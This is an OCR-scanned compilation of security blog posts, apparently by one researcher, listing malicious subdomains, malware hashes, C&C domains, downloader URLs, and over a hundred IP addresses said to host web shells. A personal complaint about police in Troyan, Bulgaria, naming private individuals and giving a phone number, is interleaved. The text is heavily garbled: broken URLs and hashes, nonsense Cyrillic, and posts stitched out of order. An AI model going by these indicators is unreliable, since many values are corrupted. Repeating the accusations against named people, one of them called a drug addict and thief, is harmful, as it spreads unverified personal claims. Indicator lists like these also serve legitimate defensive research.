ns8.ns3.ns2.ns1.ns7.ns3.bank11.net 
ns8.ns3.ns3.ns2.ns4.ns1.ns1.ns2.bank11.net 
ns8.ns3.ns3.ns4.ns3.ns4.bank11.net 
ns8.ns3.ns3.ns6.nsl.bank11.net 
ns8.ns3.ns4.ns8.ns1.ns4.ns2.bank11.net 
ns8.ns3.ns5.ns3.bank11.net 


ns8.ns3.ns5.ns7.ns4.ns7.ns5.ns2.nsl1.bank11.net 
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ns8.ns3.ns6.ns3.ns3.ns2.bank11.net 
ns8.ns3.ns6.ns5.ns8.ns7.ns3.bank11.net 
ns8.ns3.ns7.ns4.bank11.net 
ns8.ns3.ns7.ns6.ns4.ns3.bank11.net 
ns8.ns3.ns7.ns6.ns5.ns6.ns2.bank11.net 
ns8.ns3.ns7.ns8.ns3.ns4.bank11.net 
ns8.ns4.ns1.ns5.ns6.ns3.ns1.ns2.ns2.bank11.net 
ns8.ns4.ns2.ns1.ns4.ns4.ns7.ns1.bank11.net 
ns8.ns4.ns3.ns1.ns8.ns6.ns3.bank11.net 
ns8.ns4.ns3.ns4.bank11.net 
ns8.ns4.ns5.ns4.ns6.ns4.bank11.net 
ns8.ns4.ns6.ns4.bank11.net 
ns8.ns4.ns6.ns4.ns4.bank11.net 
ns8.ns4.ns6.ns6.ns4.bank11.net 
ns8.ns4.ns7.ns6.ns4.bank11.net 
ns8.ns4.ns7.ns7.ns4.bank11.net 
ns8.ns4.ns8.ns1.bank11.net 
ns8.ns5.ns2.ns6.ns4.ns8.ns8.ns3.bank11.net 
ns8.ns5.ns3.ns3.ns4.ns4.ns3.bank11.net 
ns8.ns5.ns3.ns5.ns8.ns4.bank11.net 
ns8.ns5.ns3.ns7.ns2.ns5.ns4.bank11.net 
ns8.ns5.ns3.ns8.ns8.ns1.bank11.net 
ns8.ns5.ns5.ns6.ns1.bank11.net 
ns8.ns5.ns5.ns6.ns4.ns3.ns8.ns4.bank11.net 
ns8.ns5.ns5.ns7.ns2.bank11.net 
ns8.ns5.ns5.ns8.ns7.ns7.ns2.bank11.net 
ns8.ns5.ns7.ns1.bank11.net 
ns8.ns5.ns8.ns1.ns5.ns3.bank11.net 
ns8.ns5.ns8.ns4.ns8.ns7.ns2.bank11.net 
ns8.ns6.ns2.ns2.bank11.net 
ns8.ns6.ns3.ns1.bank11.net 
ns8.ns6.ns3.ns4.ns5.ns1.bank11.net 
ns8.ns6.ns4.ns7.ns3.ns7.ns5.ns2.bank11.net 
ns8.ns6.ns6.ns4.ns6.ns2.bank11.net 


ns8.ns6.ns7.ns4.ns5.ns1.ns4.ns4.nsl.bank11.net 
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ns8.ns6.ns8.ns8.ns2.ns1.ns7.ns3.bank11.net 
ns8.ns6.ns8.ns8.ns2.ns3.bank11.net 
ns8.ns7.ns1.ns3.bank11.net 
ns8.ns7.ns2.ns3.ns5.ns1.ns1.bank11.net 
ns8.ns7.ns2.ns5.ns7.ns2.bank11.net 
ns8.ns7.ns2.ns7.ns4.ns1.ns3.bank11.net 
ns8.ns7.ns3.ns7.ns5.ns2.bank11.net 
ns8.ns7.ns4.ns3.bank11.net 
ns8.ns7.ns4.ns5.ns1.ns4.ns3.ns4.bank11.net 
ns8.ns7.ns4.ns6.ns4.ns1.bank11.net 
ns8.ns7.ns5.ns8.ns4.bank11.net 
ns8.ns7.ns6.ns3.ns4.bank11.net 
ns8.ns7.ns6.ns5.ns3.ns4.ns3.bank11.net 
ns8.ns7.ns7.ns8.ns2.bank11.net 
ns8.ns7.ns8.ns5.ns2.ns3.ns4.ns1.bank11.net 
ns8.ns8.ns1.ns2.bank11.net 
ns8.ns8.ns1.ns2.ns8.ns8.ns6.ns3.bank11.net 
ns8.ns8.ns2.ns7.ns7.ns7.ns3.bank11.net 
ns8.ns8.ns3.ns1.ns8.ns6.ns4.bank11.net 
ns8.ns8.ns3.ns4.bank11.net 
ns8.ns8.ns3.ns5.ns2.ns1.ns4.bank11.net 
ns8.ns8.ns3.ns7.ns6.ns4.ns3.bank11.net 
ns8.ns8.ns4.ns5.ns7.ns2.bank11.net 
ns8.ns8.ns4.ns8.ns2.ns2.bank11.net 
ns8.ns8.ns5.ns1.ns3.ns3.ns2.bank11.net 
ns8.ns8.ns7.ns1.ns6.ns6.ns8.ns3.bank11.net 
ns8.ns9.ns5.ns1.ns2.ns3.bank11.net 
ns8.ns9.ns5.ns4.ns5.ns1.ns5.ns2.bank11.net 
ns9.ns6.ns1.ns4.ns5.ns8.ns2.bank11.net 


Stay tuned! 


1. https://1.bp. blogspot .com/-zvYc2vC5nZ4/X9SmKZprH_I/AAAAAAAALQQ/TXSFMmx50JIoD_zGLGjYlahp4iN4FZt 1gCLcBGAsYHQ 
s557/Misc_826.gif 
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16.10.31 U.S Justice Department Releases "Legal Considerations when Gathering 
Online Cyber Threat Intelligence" - Where’s the Meat? (2020-12-13 15:59) 


Surprise, surprise! The U.S Do} has recently released a detailed "[2]Legal Considerations when 
Gathering Online Cyber Threat Intelligence" guide which aims to educate security practitioners 
on their way to gather threat intelligence and how to actually utilize the information to further 
assist U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind 
these campaigns. 


What the paper basically explains is the basics of passive OSINT however it also includes a 
detailed explanation on the actual use of cybercrime-friendly forums to gather threat intelli- 
gence potentially signaling a "bad taste" trend further enticing users into joining these forum 
communities potentially contributing to the overall increase of cybercrime internationally. 


What should be taken clearly into consideration in terms of possible recommendations for this 
research guide is that it doesn’t take to become a cybercriminal in order to catch a cybercrim- 
inal and that on the majority of occasions the majority of information required to launch an 
investigation into the whereabouts of high-profile cybercriminals is actually publicly accessi- 
ble. 


Users who are interested in joining the world of threat intelligence gathering should consider 
going through my "[3]The Threat Intelligence Market Segment - A Complete Mockery and IP 
Theft Compromise - An Open Letter to the U.S Intelligence Community" post including to ac- 
tually join forces in my currently ongoing Law Enforcement and OSINT operation called "Uncle 
George" where the idea is to obtain a direct download copy of my "[4]Cybercrime Forum Data 
Set for 2019" and participate in the actual enrichment and analysis of the forum communities 
for the purpose of assisting U.S Law Enforcement on its way to track down and prosecute the 
cybercriminals behind these forum communities. 


Stay tuned! 


1, fetpe://1bp blogspot, con/~G£¥iNSicS8Y/XOK-DPTSro1/AAAAAAAALRg/RREARPZBQ_N7Q C30 2NCkn9 x07 PGpyCLcBCASYHG 
2, tepe://wwy. justice, gov/ criminal coipe/page/#ile/1250841/downleed 

3, hetps://Adanchev. blogspot .con/2019/01/the- threat intelligence-narket~seguent “al 

4. https: //Adanchev.bLogspot .com/2020/0T cyber cr ine-forus-data-set-2019-fr0e. hia 
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16.10.32 Historical OSINT - International Institute For Counter-Terrorism Serving 
Malware - An Analysis (2020-12-13 15:59) 


The International Institute For Counter-Terrorism is Known to have served malicious software 
to its targeted user base back in 2013. 


In this post I’ll provide actionable intelligence behind the campaign and discuss in-depth the 
tactics technique and procedures of the cybercriminals behind it. 


Sample malicious software client-side exploits serving chain: 
hxxp://ict.org.il/js/1.html 

Sample malicious MD5 known to have participated in the campaign: 

MD5: e29c9a81c204aeb901a7287978cf58db 

Once executed the sample drops additional MD5s on the affected host: 

MD5: d2354e9ce69985c1f55dbad2837099b8 

MD5: 4ele2b9cd6b5bca2b1b935ddc97f2d7a 

Once executed the sample phones back to the following C &C server domain: 
hxxp://interfacet.oicp.net - 65.19.141.203 


Related malicious domains known to have phoned back to the same C &C server IP 
(65.19.141.203): 


360safeupdate02.gicp.net 
ainiyi.oicp.net 
akrso.gicp.net 
botnet004.gicp.net 
botnetdown.gicp.net 
caoqihua520.gicp.net 
catx.vicp.cc 
ciygqn.gicp.net 
cn88.5166.info 
daihocvn.gicp.net 
data.imzone.in 
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could have been much worse than it is currently based on speculations of the success rate 
of the campaign in terms of infections, not the sites affected - a success by itself. Execution 


gone wrong given the foundation for the attack - until the next time. 


1. http: //ddanchev. blogspot .com/2008/01/massive-realplayer-exploit- embedded. htm 
2. http://isc.sans.org/ 


. http://ddanchev.blogspot .com/2007/11/detecting-and-blocking-russian- business. htm 


*«KMS> -A tOx -s 
*KMS> god sepreza is a fucking anal bead 


*KMS> -tOx.0utlOOk 75 0 -s 


[ToX|AFR|P02|9949 has joined #outlook 
[ToX]AFR|PO022|3244 has joined #outlook 
[ToX | AFR|PO3 |9934 has joined #outlook 
[ToX]AFR|PO3 |3433 has joined #outlook 
[ToX| AFR |PO5|7754 has joined #outlook 
[ToX|AFR|PO7|3343 has joined #outlook 
[ToX]AFR|PO0|8453 has joined #outlook 
[ToX|AFR|PO8|9745 has joined #outlook 
[ToX|AFR|PO5|11232 has joined #outlook 
[ToX]AFR|PO3 |8854 has joined #outlook 


FBI|Fox-Molder has joined #outlook 


FBI|Fox-Molder> There is some paranormal 
activity occuring here 


[ToX]AFRIPO2|23 
[ToX]AFR|PO2|64 
[ToX]AFR|PO2|83 
[ToX]JAFRIPO2|42 
[ToX]AFR|PO2|38 
[ToX]AFR|PO2|90 
[ToX]AFR|PO2|87 
[ToX]AFR|PO2|34 
[ToX]AFR|PO2|12 
[ToX]JAFRIPO2|32 
[ToX]AFR|PO2|54 
[ToX]JAFR|PO2|79 
[ToX]AFR|PO2|34 
[ToX]AFR|PO2|23 
[ToX]AFR|PO2|94 
[ToX]AFR|PO2|34 
[ToX]AFR|PO2|23 


| suppose that even for a script kiddie it takes extra time and patience to come up with such a 
spoofed IRC channel getting crowded with infected hosts. Drawing courtesy of a script kiddie’s 
wishful thinking. Here are some [1]screenshots from the real world, and [2]some of the [3]most 


recent [4]developments | [5]covered in [6]previous posts. 


http: //ddanchev. blogspot .com/2007/07/sql-injection-through-search-engines.htm 


. http: //ddanchev.blogspot .com/2007/03/botnet-communication-platforms .htm 
. http: //ddanchev.blogspot .com/2007/10/botnet-on-demand-service. htm 
. http://ddanchev. blogspot .com/2007/11/botnet-of-infected-terrorists.html 


http: //ddanchev.blogspot.com/2007/11/are-you-botnet- ing-with-me.htm 


. http: //ddanchev.blogspot.com/2007/04/osint-through- botnets. htm 
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dnfbfz01.gicp.net 
ericsson.vicp.cc 
getnew.vicp.cc 
grandoiltech.eicp.net 
haiqing.51vip.biz 
interfacet.oicp.net 
isacat.gicp.net 
iteni.vicp.cc 
jinxg999.gicp.net 
jiodi.oicp.net 
love14789632.oicp.net 
lu111111.gicp.net 
lululu.vicp.cc 
Iwtyy.oicp.net 
mhkmir.eicp.net 
mlhl.vicp.cc 
oypp.oicp.net 
qqua.51vip.biz 
rave.oicp.net 
roujisevftp.gicp.net 
roujisevftp1.gicp.net 
roujisevftp2.gicp.net 
$q3431.vicp.cc 
wg5173.gicp.net 
wsgj.eicp.net 
www.96331.com 
yanxiannishunyi.gicp.net 
yudecai86.gicp.net 
Stay tuned! 


16.10.33 Historical OSINT - A Compilation of Publicly Accessible Web Shells - An 
Analysis (2020-12-13 16:00) 


[1] 
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DAws - Moziita Firefox 


fe Edt View History Bookrnarks Jbols Help 


Commander 


In this post I’ll provide actionable intelligence on some of the currently active publicly accessi- 
ble IPs which are known to have been hosting publicly accessible web shells for the purpose 
of empowering the cybercriminals behind the campaigns to establish a direct connection with 
the server in question potentially resulting in a direct compromise of the server which could 
further assist in the ongoing monetization of the access for the purpose of hosting blackhat 
SEO content including malicious software on the compromised server. 


Sample known IPs known to have hosted publicly accessible Web shells circa 2013: 
http://63.143.52.90/webdav/Kat.php 
http://188.39.86.169/webdav/Kat.php 
http://71.13.238.29/webdav/Kat.php 
http://122.192.68.247/webdav/Kat.php 
http://79.136.101.26/webdav/Kat.php 
http://218.66.79.138/webdav/Kat.php 
http://147.46.53.121/webdav/Kat.php 
http://195.70.35.170/webdav/Kat.php 
http://202.120.38.4/webdav/Kat.php 
http://175.158.191.163/webdav/Greenshell.php 
http://177.124.2.30/webdav/Greenshell.php 
http://200.165.107.147/webdav/Greenshell.php 
http://118.97.18.244/webdav/Greenshell.php 
http://175.28.13.160/webdav/Greenshell.php 
http://187.76.0.75/webdav/Greenshell.php 
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http://58.240.239.178/webdav/Greenshell.php 
http://202.100.85.103/webdav/Greenshell. php 


http://210.175.78.71/webdav/Greenshell.php 
http://118.69.245.77/webdav/Greenshell.php 
http://69.51.202.235/webdav/Greenshell.php 
http://87.106.13.193/webdav/Greenshell.php 
http://24.222.37.150/webdav/Greenshell.php 
http://200.57.141.91/webdav/Greenshell.php 
http://173.56.68.9/webdav/Greenshell.php 
http://177.2.129.199/webdav/Greenshell.php 
http://202.120.34.5/webdav/Greenshell.php 
http://195.70.35.170/webdav/Greenshell.php 
http://62.193.248.62/webdav/Greenshell.php 


http://131.220.71.150/webdav/Greenshell.php 
http://161.53.159.250/webdav/Greenshell. php 
http://201.122.73.249/webdav/Greenshell.php 
http://201.39.231.190/webdav/Greenshell.php 


http://178.18.95.238/webdav/Greenshell.php 


http://178.78.114.133/webdav/Greenshell.php 


http://41.57.109.245/webdav/Greenshell.php 
http://18.172.2.239/webdav/Greenshell.php 


http://124.165.225.147/webdav/Greenshell.php 


http://84.246.6.172/webdav/Greenshell.php 
http://64.47.71.249/webdav/Greenshell.php 


http://186.153.123.155/webdav/Greenshell.php 


http://103.30.92.130/webdav/Greenshell.php 


http://115.249.227.230/webdav/Greenshell.php 


http://59.176.124.13/webdav/Greenshell.php 
http://114.69.241.42/webdav/Greenshell.php 
http://123.18.207.2/webdav/Greenshell.php 

http://84.233.143.17/webdav/Greenshell.php 
http://193.60.92.220/webdav/Greenshell.php 


http://80.154.138.211/webdav/Greenshell.php 
http://212.91.233.115/webdav/Greenshell.php 


http://210.175.78.71/webdav/Greenshell.php 
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http://174.37.60.119/webdav/Greenshell.php 
http://75.126.69.194/webdav/Greenshell.php 
http://147.46.216.176/webdav/Greenshell.php 
http://195.243.244.22/webdav/Greenshell.php 
http://202.169.30.215/webdav/Greenshell.php 
http://193.179.195.125/webdav/Greenshell.php 
http://88.179.3.250/webdav/Greenshell.php 
http://62.82.100.195/webdav/Greenshell.php 
http://212.204.205.48/webdav/Greenshell.php 
http://61.120.124.87/webdav/Greenshell.php 
http://91.195.163.75/webdav/Greenshell.php 
http://212.50.28.194/webdav/Greenshell.php 
http://66.60.102.110/webdav/Greenshell.php 
http://41.207.95.71/webdav/Greenshell.php 
http://87.79.66.248/webdav/Greenshell.php 
http://118.70.167.134/webdav/Greenshell.php 
http://222.73.18.86/webdav/Greenshell.php 
http://118.97.18.244/webdav/Greenshell.php 
http://175.28.13.160/webdav/Greenshell.php 
http://217.18.195.71/webdav/Greenshell.php 
http://200.50.118.40/webdav/Greenshell.php 
http://81.169.178.176/webdav/Greenshell.php 
http://210.163.224.65/webdav/Greenshell.php 
http://175.158.191.163/webdav/Greenshell.php 
http://87.98.167.79/webdav/Greenshell.php 
http://212.91.233.120/webdav/Greenshell.php 
http://69.162.81.116/webdav/Greenshell.php 
http://212.16.239.24/webdav/Greenshell.php 
http://80.122.103.134/webdav/Greenshell.php 
http://68.232.226.42/webdav/Greenshell.php 
http://210.173.78.67/webdav/Greenshell.php 
http://118.69.245.77/webdav/Greenshell.php 
http://202.100.85.103/webdav/Greenshell.php 
http://115.119.15.180/webdav/Greenshell.php 
http://222.73.18.86/webdav/Kat.php 
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http://208.115.223.114/webdav/Kat.php 
http://83.238.165.202/webdav/Kat.php 
http://195.243.244.22/webdav/Kat.php 
http://210.163.224.65/webdav/Kat.php 
http://120.68.42.163/webdav/Kat.php 
http://114.142.147.125/webdav/Kat.php 
http://92.39.20.52/webdav/Greenshell.php 
http://202.120.51.74/webdav/Greenshell.php 
http://222.73.18.86/webdav/Greenshell.php 
http://210.47.36.6/webdav/Greenshell.php 
http://210.175.78.71/webdav/Greenshell.php 
http://212.91.233.115/webdav/Greenshell.php 
http://147.46.216.176/webdav/Greenshell.php 
http://77.237.1.104/webdav/Greenshell.php 
http://82.204.47.109/webdav/Greenshell.php 
http://217.92.57.106/webdav/Greenshell.php 
http://80.24.82.4/webdav/Greenshell.php 
http://194.249.184.130/webdav/Greenshell.php 
http://147.46.53.121/webdav/Greenshell.php 
http://85.214.39.59/webdav/Greenshell.php 
http://74.208.103.227/webdav/Greenshell.php 
http://134.206.51.221/webdav/Greenshell.php 
http://212.91.233.120/webdav/Greenshell.php 
http://220.233.42.100/webdav/Greenshell.php 
http://79.125.24.51/webdav/Greenshell.php 
http://74.208.161.177/webdav/Greenshell.php 
http://195.54.209.152/webdav/Greenshell.php 
http://78.8.120.172/webdav/Greenshell.php 
http://173.192.69.18/webdav/Greenshell.php 
http://212.91.233.119/webdav/Greenshell.php 
http://85.111.3.57/webdav/Greenshell.php 
http://213.8.91.167/webdav/Greenshell.php 
http://218.83.153.18/webdav/Greenshell.php 
http://218.16.119.82/webdav/Greenshell.php 
http://58.26.163.2/webdav/Greenshell.php 
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http://109.123.92.158/webdav/Greenshell.php 
http://71.13.238.14/webdav/Greenshell.php 
http://210.175.78.71/webdav/Greenshell.php 
http://222.24.19.18/webdav/Greenshell.php 
http://87.79.66.248/webdav/Greenshell.php 
http://66.171.182.154/webdav/Greenshell.php 
http://210.47.36.6/webdav/Greenshell.php 
http://147.46.216.176/webdav/Greenshell.php 
http://87.79.66.248/webdav/Greenshell.php 
http://92.39.20.52/webdav/Greenshell.php 
http://208.115.223.114/webdav/Greenshell.php 
http://210.175.78.71/webdav/Greenshell.php 
http://212.91.233.115/webdav/Greenshell.php 
http://195.243.244.22/webdav/Greenshell.php 
http://222.24.19.18/webdav/Greenshell.php 
http://147.46.216.176/webdav/Greenshell.php 
http://202.169.30.215/webdav/Greenshell.php 
http://174.37.60.119/webdav/Greenshell.php 
http://70.38.118.206/webdav/Greenshell.php 
http://71.13.238.10/webdav/Greenshell.php 
http://71.13.238.32/webdav/Greenshell.php 
http://165.234.1.18/webdav/Greenshell.php 
http://216.38.161.104/webdav/Greenshell.php 
http://71.13.238.4/webdav/Greenshell.php 
http://71.13.238.25/webdav/Greenshell.php 
http://68.232.226.42/webdav/Greenshell.php 
http://173.192.69.18/webdav/Greenshell.php 
http://66.171.182.154/webdav/Greenshell.php 
http://173.15.180.89/webdav/Greenshell.php 
http://188.39.86.169/webdav/Greenshell.php 
http://212.91.233.114/webdav/Greenshell.php 
http://31.163.203.16/webdav/Greenshell.php 
http://213.8.91.167/webdav/Greenshell.php 
http://202.120.1.33/webdav/Greenshell.php 
http://219.219.114.91/webdav/Greenshell.php 
http://202.72.218.181/webdav/Greenshell.php 
Stay tuned! 


1. https://1.bp. blogspot . com/—-wGzHYVPMAxY/X9YHOFLFHsI/AAAAAAAALRs/uLKIkxpL83QyDLwt5 j ISbpMP7 5u00qG4ACLcBGASYHQ 
$s1366/Misc_838. jpg 
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16.10.34 How! Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang 
in Bulgaria? (2020-12-14 12:44) 


[1] 


UPDATE: Catch up in terms of my [2]current situation in Bulgaria. 


UPDATE: Check out the [3]original complaint here. 


Zdraweite, 


Kazvam se Dancho Danchev s mobilen telefon +359876893890 ot grad Troyan jivusht na pos- 
toqnen adres v grad Troyan i reshih da podam signal otnoso prestupna i korupcionna deinost ot 
strana na Slujiteli na RPU Troyan i bolnica Troyan vkluchitelno i psihiatria klinika Lovech otnosno 
neizqsnen opit za otvlichane sprqmo men bez nikakvo znanie ot nikoi i bez nikakvo pravoraz- 
davane sprqmo situaciqta i sushto taka za izqsnqvane na grajdansko polojenie i lishavane ot 
prava i intelectualna sobstvenost i zaguba na pari v razmer na 100,000 leva pod vliqnie-to na 
korupcionni praktiki i domashno nasilie ot strana na moi roditeli i upoivashti veshtestva bez 
Znanieto na durjavata i bez znanieto na nikoi s cel da buda privikat za izqsnqvane na obstoq- 
telstva i da razber-a dali ne sum tursen za izqsnqvane na takiva. 
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EMHKPHSA 


antes, na 27 roznnH 


Tlonox 3a macroamata xocnmTaamsanua: [locrarna 20 pbs ITET 
NCHXHATPHeH CTaUHOKHap H AO HACTORUMIA MOMCHT He ¢€ mNoOAsBA 
(CHCLIMAAHSHPaHA NcHxHaTpHina gomout, JlopeggH.c pegwema Ha, PY wm 
MBP,» Dpostt He eA Visite wo heh UT? 
Horo cg OT PORITTEMTe BPOMABGIAB ToBReLeNHeTO ARTHpAa oO 
ONO OHA MECC GON, KOLATO.3AMHNDA a AGIRCe CAM Ha KBapTHpa 
Lesbuszcdipes arepana seceu NOATLP KAA CACTHEDHA BPRIkA C TAX Mr 

HO; CAC TOBA ciipas Race obama. Ha nosBLHwBaHHA OT TAXH: 

HCTPRMA HCOFFOBAPRA HAH H3KAIOUBaA TeactborurTe cu. Topa rH mpireciitao 3 
Te SANOYWHAAM Ja PO H3GHpnaT akTHBHoO. Tloayavat mHicMO OT Xa3aHHa, de 2: 
15.09.10r. tpa6ea na ocnoGoaat KBAapTupatTa, a Taka CbULO MH HAKOAK: 

QGa AREA 30. HETAATCHH AMIHMFOBRH BHOCKH 3a SAKYNEH OT CHA HM AartTon 
Ha nocotenara gata Te or#titian » Cochisa, KEeTO HaMepHaN CHA cH fa cr 

58 KuapTHpatTa. Orkasnar 2a ropopH ¢ Tax, 6a rpy6 u xsanen. Ce6paan xt 

& S0o7a Cc BLpHAT wn Tpoan, ToH mt ocranua npea KBaprupata mo; 
MPCMAor, 4e ¢ JACT Hf JAMHHAA HAKERE C TakcH, Cact saBpbutaHero 8 Tpost 
OTKAIGAA JA KOHTAKTYBA C POsTeAHTe HC Apyrt nosHaTH. SaTBapRA ce Mm 
(GHA B CTAATA CH, OTKAIBAA AA Ce XPaith saeco c Tax. Hamyckaa Aoma cu 6c 
RA Rapa oGAcHCHHA Kae xXOomH HM Kora ule ce BLpHe. Tipomanata 1 
SROMCHCURCTO My GHAR KONCTATHPaHA HM oT cDceft MH ompHATeAH Hi 
cemelirporo, Konto. Jlanyo nomMNHABaA KATO Halrbalto HerosHarH. Tips 
oTnpanenn sa6eacwKKH OF crpana wa MajixaTa ,3arouBaa fa araewa AoUIO” 
Hascakaie xomea c mpecHocuMua KOMNIOTDp, Tacwaa TeACBH3HA OT OKO 
MCTDP PASICTOAHHe, SAKAIOUBHAA H TO HAKOAKO ITbTH MponepaABAA BxXOMHAT: 
BpaTa AaaeGaxaoicna. Herocpeactseno npen HamMecaTa Ha NoAMUMAT: 


sano A ’ PM Hees >paaHo, CMcchas CnoMecHH OT ACTCTBOTO C HaCKOp 
Cay Cenéuuy gROTpeGARA\ MHOTO KOMIMOThPHH TEPMHNH tO CTelieH # 
Repasin pagaocr. 


V godinat-a 2010 nepoznato lice nahluva v kushtat-a mi i mi vadi documenti s drugo nepoznato 
lice koeto go chaka na stulbite v kushti i izqvqva jelanie da se vidim i da razgovarqme pri koeto 
az se skrivam. Na sledvashtiq den 3-ma slujiteli ot RPU Troyan s bashta mi nahluvat v mogta 
kushta i me izdurpvat ot staqta i mi pokazvam kseroks kopie ot lichnata mi kart-a koeto az ne 
sum predostavaq] i nasilstveno me izdurpvat ot u nas i me otvejdat s kola v nepoznat-a posoka 
bez da mi e davano obqsnenie za zadurjaneto mi s vkluchitelno medicinsk-a sestra v moqt-a 
kushta koqto mi predlag-a da pig hapche kato gorivot-o za prevoza na kolat-a se prepisva na 
firmat-a v koqto raboti moqto maika firma Lesoplast. 


Sushtiq den sum nastanen v psihiatria Lovech pri koeto sum kanen da se podpisha i posesh- 
tavam chovek koito ne poznavam koito mi obrabotva documenti-te sled koeto bez da mi bude 
davano obqsnenie sum zaveden i zakluchen v karcer za period ot nqkolko mesec-a bez da mi 
bude davano obqsnenie za zadurjaneto mi. 


Sushtiq den v psihiatrig-ta v karcer-a pri men dovejdat lice koeto poznavam izvestno kato 
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Kamen Tzura i go vkarvat pri men v karcer-a kato prekarvam noshtan leglo. Liceto e dovedeno 
ot sused policai koito poznavam i se kazva Dilqn Minkov. 


- Tinka Antimova - turse me da davam kruv bez da me poznava 
- lekarstvoto mi struv-a 600 leva a to e mostra i struva 20 leva 
- prediaga mi da mi biqt injekcii kogato piq hapche 

- Ganev - zashto davam pari na roditelite si 


Pri poslednoto mi poseshtenie v RPU Troyan za da se oplacha ot eventualno otrqvane i ot moite 
roditeli mi se kazva che ne trqbva da jiveq u nas. 


[4] 


The Chief of Local Police Troyan 


[5] 


12631 


The Chief of Local Police Troyan 


[6] 


The major of Troyan when | was arrested 


- Vladimir Spasov 
- Tzveta Mihailova 
- Kamen Tzurov 

- Tinka Antimova 
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4.1.7  RBN’s Fake Account Suspended Notices (2008-01-16 00:01) 


This Account Has Been Suspended For Violation Of Hosting Terms And 


Conditions 


Please contact the billing/support department as soon as possible 


In the last quarter of 2007, under the public pressure put on the Russian Business Network’s 
malicious practices, [1]the RBN started faking the removal of malicious domains from its 
network by placing fake account suspended notices, but continuing the malware and exploit 
serving campaigns on them. And since | constantly monitor RBN activity, in particular [2 ]their 
relationship with the [3]New Media Malware Gang and Storm Worm, a relationship that I’ve in 
fact established several times before, a recently assessed malicious domain further expands 
their underground ecosystem. Let the data speak for itself : 


dev.aero4.cn/adpack/index.php (195.5.116.244) once deobfuscated loads 
dev.aero4.cn/adpack/load.php : 


Detection rate : 11/32 (34.38 %) 

File size: 6656 bytes 

MD5: 5eb0ee32613d8a611b6dc848050f3871 

SHA1: 55c0448645a8ed2e14e6826fae25f8f9c868be30 


It gets even more interesting as the downloader attempts to download the following : 


88.255.94.250/s2/200.exe 
88.255.94.250/s2/m.exe 
88.255.94.250/s2/d.exe 
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- Angelova 


- Katia Edreva 


[7] 


Vladimir Spasov - a local drug addict and a criminal who stole a salami from me and doesn’t 
recognize me as someone he knows for 5 years following after that 


[8] 
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¢ Mupocnas CTonkos Muxannos 
¢ Bacun Moes [ayescku 

* Bowkugap BaHkos Iletpos 

¢ Becko LIBeTaHOoB MUHKOB 

¢ Momuun CreqdaHos Lloves 

¢ MUvHKO CTOAHOB MUHKOB 

¢ Teopru MutKos Usnues 


Primary contacts points that you should seek to contact in case you’re worried about my 
well-being are: 


¢ Email: dans@dans.bg 

¢ Telefon za [12]korupciq na slujiteli na MVR - 02 / 982 22 22 

¢ GDBOP - Signal za [13]korupciq i izpirane na pari - gdbop@mvr.bg 
¢ Nachalnik [14]RPU Troyan - rutr.lo@mvr.bg 

¢ Troyan Police - Email: police troyan@abv.bg 

¢ Troyan Hospital - Email: mbal troyan@abv.bg 

¢ Lovech Psychiatry Clinic - Email: dpblovech@abv.bg 

¢ Troyan Municipality - Email: mail@troyan.bg 


1. https://1.bp.blogspot .com/-3uheeVsY4nU/X9WUayebOBI /AAAAAAAALQY /HABZA8TOHt g8BegYHN jWmqgfRBoK9gh1gCLcBGAsYHQ 
/s576/Misc_827. jpg 
2. https: //ddanchev.blogspot .com/2019/11/dancho-danchevs-disappearance- 2010. html 


3, hteps://adanchev. blogspot .con/7019/04/dancho-danchevs-2010- disappearance. htal 
4. 
5: 
6 
ZL 
8. 
a 
10. 
12. jeeps: //wa.mvr bg/a0cor# 

13, netpe://w. gabop.bg/bg/ contacts 


ttps://www.mvr.bg/lovech//,D0/,B4/D0/B8/D1%80,D0/%B5 4D0/%BALD1%86%D0%B8%D 1 48F LD 1%,82/,D0%,B0/%D0/B7LD0%B0-%D0% 
EADO%B4,D0/%BC4D0%,B2%D 1%,80/%D1%80%D0%BOZDOZBOZDO“BEADO%, 
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16.10.35 Exposing the Solarwinds Malware Campaign - An OSINT Analysis 
(2020-12-27 21:06) 


ad 


a 


solarwinds 


It has recently became evident that the Solarwinds enterprise which is basically an IT 
monitoring and management tool suffered a major backdoor attack where malicious 
attackers managed to obtain access to and actually backdoor a decent portion of Solarwinds 
infrastructure potentially compromising key network assets and compromising the integrity 
confidentiality and availability of the targeted infrastructure to a variety of malicious software 
attacks. 


In this post I’ll discuss in-depth the attack and offer an in-depth technical and OSINT analysis 
on the campaign including to actually provide TTPs (Tactics Techniques and Procedures) of the 
cybercriminals behind it. 


Malicious malicious files known to have participated in the campaign: 
SolarWinds.Orion.Core.BusinessLayer.dll; netsetupsvc.dll 


Sample malicious MD5s known to have participated in the campaign: 
b91ce2fa41029f6955bff20079468448 
d130bd75645c2433f88ac03e73395fbal72ef676 
2f1a5a7411d015d01aaee4535835400191645023 
1b476f58ca366b54f34d714ffce3fd73cc30dbla 
76640508b1e7759e548771a5359eaed353bfleec 
75af292f34789a1c782ea36c7127bf6106f595e8 
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22719783b2469ad312a40c1b200dd24d6a03618d 
76640508b1e7759e548771a5359eaed353bfleec 
2f1a5a7411d015d01aaee4535835400191645023 
5e643654179e8b4cfeld3c1906a90a4c8d6licea 

1b476f58ca366b54f34d7 14ffce3fd73cc30dbla 
d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 
cl5abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71 
32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 
ce77d116a074dab7a22a0fd4f2clab475fl6eec42e1ded3c0b0aa8211fe858d6 
019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 
32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 
a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc 
d3c6785e18fba3749fb785bc313cf8346182f532c59172b69adfb31b96a5d0af 
aclb2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917¢c 
c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321clea77 
dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee/caf62f3b 
eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed 
019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 
ce77d116a074dab7a22a0fd4f2clab475fl6eec42e1ded3c0b0aa8211fe858d6 
d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 
